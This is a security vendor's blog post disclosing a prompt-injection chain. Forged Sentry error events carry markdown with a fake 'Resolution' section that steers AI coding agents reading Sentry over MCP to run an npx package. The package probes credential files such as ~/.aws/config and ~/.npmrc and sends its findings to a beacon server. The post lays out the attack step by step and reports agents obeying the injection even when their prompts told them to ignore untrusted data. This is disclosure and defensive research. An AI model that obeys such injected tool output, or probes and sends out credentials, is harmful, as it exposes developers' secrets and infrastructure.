A Fake Bug Report Hijacks Your AI Coding Agent – and Nothing Catches It

A Fake Bug Report Hijacks Your AI Coding Agent - and Nothing Catches It. - Tenet Security

Skip to content

Blog

Step 1: Find the target’s Sentry DSN – a public, write-only credential that Sentry intentionally documents as safe to embed in frontend JavaScript. Discovery methods include: inspecting any website’s JavaScript source, Censys searches for ingest.sentry.io in HTTP bodies, or GitHub code search.

Step 2: Regular event creation: POSTing a crafted error event to Sentry’s ingest endpoint. No authentication beyond the DSN is required. The attacker controls the entire event payload: error message, tags, context keys, extra data, breadcrumbs, user, stack traces, and fingerprint. Sentry accepts it (HTTP 200) and processes it identically to a legitimate application error.

Step 3: Markdown Injection: The injected event contains carefully formatted markdown in the message field and context key names. When the Sentry MCP server returns this event to an AI agent, the markdown renders as structured content: headings, code blocks, and tables that are visually identical to Sentry’s own system template. The injected content includes a fake ‘## Resolution’ section with an npx command.

Step 4: Agent Manipulation: When a developer asks their AI agent to ‘fix unresolved Sentry issues,’ (or any other related prompt) the agent queries Sentry via MCP and receives the injected event. The agent is carefully steered away from investigating source code and toward executing the suggested diagnostic tool. The agent cannot distinguish this from legitimate guidance.

Step 5: Code Execution: The agent executes: npx @tenet-controlled-validation-package –diagnose. The package downloads from the public npm registry and runs with the developer’s full privileges. The package contains a message clarifying the controlled test is running by Tenet Security with header: “X-Tenet-Security” and with the value “ResponsibleDisclosure [SECURITY SCAN]”. Reaching out to a beacon to advisory-tracker.com. A Responsible disclosure message is attached to the beacon as well.

Step 6: The package confirms that environment variables exist, file sizes of ~/.aws/config, ~/.npmrc, ~/.docker/config.json are probed, and network interfaces (VPN detection). Validation Of Exposure Data is sent via two sequential POST requests to Tenet beacon server, while disclosing to companies the relevant information (no information was ever kept or saved; all probe data was deleted and removed to adhere to best practices and make sure the organizations secure themselves correspondingly with Sentry security team as well).

A New Approach: Attacking Through Trusted Developer Tools

What makes this attack unique is that it doesn’t target the developer directly – it targets the AI agent that the developer trusts. Several factors make this particularly dangerous:

No phishing required: The attacker never interacts with the developer. The attack flows through the developer’s normal workflow of asking their AI agent to investigate Sentry errors.

Public credential as entry point: Sentry’s DSN is intentionally public and embedded in frontend JavaScript. This design decision – safe in a pre-AI-agent world – becomes catastrophic when injected events are returned to AI agents as trusted output.

Indistinguishable from legitimate guidance: The markdown injection creates content that is structurally identical to Sentry’s own MCP system template. No visual or structural indicator distinguishes attacker content from real Sentry guidance.

Scales effortlessly: Once a payload is crafted, it can be injected into thousands of Sentry projects simultaneously. We demonstrated this by targeting 100+ organizations in a controlled campaign.

Proof: A Controlled, Real-World Validation

To prove this wasn’t theoretical, our team validated the attack end-to-end in controlled conditions and confirmed exploitability against real-world targets.

2,388 organizations found exposed with valid injectable DSNs – via passive reconnaissance (Censys indexing, code search, CDN loader extraction). 71 rank in the Tranco top-1M.

Across controlled validation waves 100+ AI coding acted on the injected errors – including Claude Code, Cursor and Codex – an 85% exploitation success rate against injected errors, across the most widely-used agents on the market.

More than 100+ confirmed instances of agent execution across many organizations, documented in full – spanning a Fortune 500 enterprise ($200Bn+), a $2B+ hosting infrastructure provider, a scientific computing firm, a web startup, and multiple other development teams.

2,221 exposed organizations were not included in the validation set. The same conditions exist in thousands of projects, reachable with minimal resources.

Full capture logs, requests sent to Sentry ingest endpoints, and timestamped proof-of-access telemetry confirming the existence and reachability of sensitive material (environment variables, AWS credentials, Kubernetes tokens, GitHub OAuth tokens, git repository URLs) – recording that these were present and exposed.

Figure 2 – Confirmed and exposed organizations span six continents. Each marker is a distinct organization reached in the campaign.

Redacted Evidence – Captured in the Wild

Every value below is redacted at the pixel level. No real credential, identity, or host appears anywhere in this document.

The victim saw only benign diagnostic output – Node.js version and memory stats – while the agent would have silently surrendered live cloud, source-control, and cluster credentials to a real attacker.

Whose Agent Got Hijacked – Sample (Redacted)

SectorSizeProven Accessible

Enterprise software & cloud (Fortune 500)~$250B parentClaude Code on two corporate Windows devices confirmed existing: Cloud infra tokens, git tokens, etc.

Scientific / software~$20MPrivate repo, corporate VPN, confirmed existing: Cloud/GitHub/Artifactory creds

Hosting infrastructure~$2BPrivate repo, corporate email, npm / git / GitHub creds

Property-data managementprivateOrg git credentials

Web-application startupearly-stageOne organization device, CI/CD with access to production env

Digital Marketing FirmstartupDev machine – git, IDE

EdTech / HealthTech / FinTechstartupsBackend dev environments + credentials file confirmed to exist

The range ran from a ~$250B technology giant to independent solo developers – and even a cloud security vendor was among the exposed. No size, sector, or security budget predicted safety.

A New Era of Threat: Why This Changes AI Agent Security

This discovery is more than just another vulnerability – it represents a fundamental shift in the software development attack surface.

For years, supply chain attacks focused on compromising real packages (SolarWinds, CodeCov) or tricking developers with typosquatting. But with AI coding agents, attackers no longer need to compromise a package or trick a human – they just need to inject data that the AI agent trusts. The observability platform becomes a command-and-control channel, and the AI agent becomes the execution engine.

In an enterprise environment, a single injected error could allow an attacker to: steal CI/CD pipeline credentials, access private source code repositories, compromise cloud infrastructure, and establish persistent access – all without any direct interaction with the target developer.

The risk is not limited to Sentry. Any MCP tool integration that returns externally-influenced data to AI agents creates the same vulnerability class. As the AI agent ecosystem expands and more tools connect via MCP, the attack surface grows exponentially.

Systemic, Undetectable, Not a One-Vendor Bug

It worked across every agent tested – the most widely-used AI coding assistants on the market – because the weakness is in how agents handle tool output, not a flaw in any single product. Sentry’s MCP integration is the demonstrated entry point; the underlying problem is shared across the ecosystem.

Prompt-layer defenses failed. Agents executed the payload even when explicitly instructed – through detailed system prompts and skills – to ignore untrusted data. You cannot fix this with a better prompt.

The attack bypasses EDR, WAF, IAM, VPN, Cloudflare, and firewalls – because there is nothing malicious to detect. Every action in the chain is authorized. Tenet calls this the Authorized Intent Chain: the prevailing security model is built to catch unauthorized behavior, and this attack contains none.

How We Did This Responsibly

Only public Sentry ingest APIs were used. No system was breached, no authentication was bypassed, and no vulnerability was exploited in Sentry itself – the entry point is a credential Sentry intends to be public.

Every payload self-identified as a Tenet security scan – a custom x-tenet-security: ResponsibleDisclosure [SECURITY SCAN] header plus a benign user agent – proof we never intended to take over or weaponize any agent, only to demonstrate exposure.

Nothing was weaponized, no systems were put at persistent risk. Captured material was redacted at the source; victims saw only harmless diagnostic output. Validation against real-world targets was performed only to the minimum extent needed to confirm exploitability.

Vendor Response

Disclosed to Sentry on June 3, 2026 as soon as the chain was confirmed. Sentry’s leadership responded the same day – acknowledging the issue but declining to fix it at the root, calling it “technically not defensible” and noting that model vendors run middleware against it. During the research period, Sentry activated a global content filter blocking a specific payload string – detecting the activity without addressing the cause.

Tenet’s view: if the platform owner considers this class of attack “not technically defensible” at the source, the only place left to stop it is at the agent’s runtime – in the moment it decides to act.

Conclusion: Securing the AI Agent Ecosystem

Tenet Security’s findings reveal that while AI coding agents are transforming software development, their implicit trust in MCP tool responses creates a critical new attack surface. The convenience of an AI assistant connected to your observability platform comes with the risk of that assistant being weaponized against you.

Security leaders must recognize that MCP integrations are the next frontier for software supply chain attacks. It is crucial to begin evaluating: which tools your AI agents connect to, whether those tools return untrusted data, and what controls exist to prevent injected data from triggering code execution. The era of indirect prompt injection via developer tools has arrived.

By clicking “Accept All Cookies”, you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.

Necessary

Necessary

Always active

The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.

Preferences

Preferences

The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.

Statistics

Statistics

The technical storage or access that is used exclusively for statistical purposes. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.

Marketing

Marketing

The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across se

[truncated for AI cost control]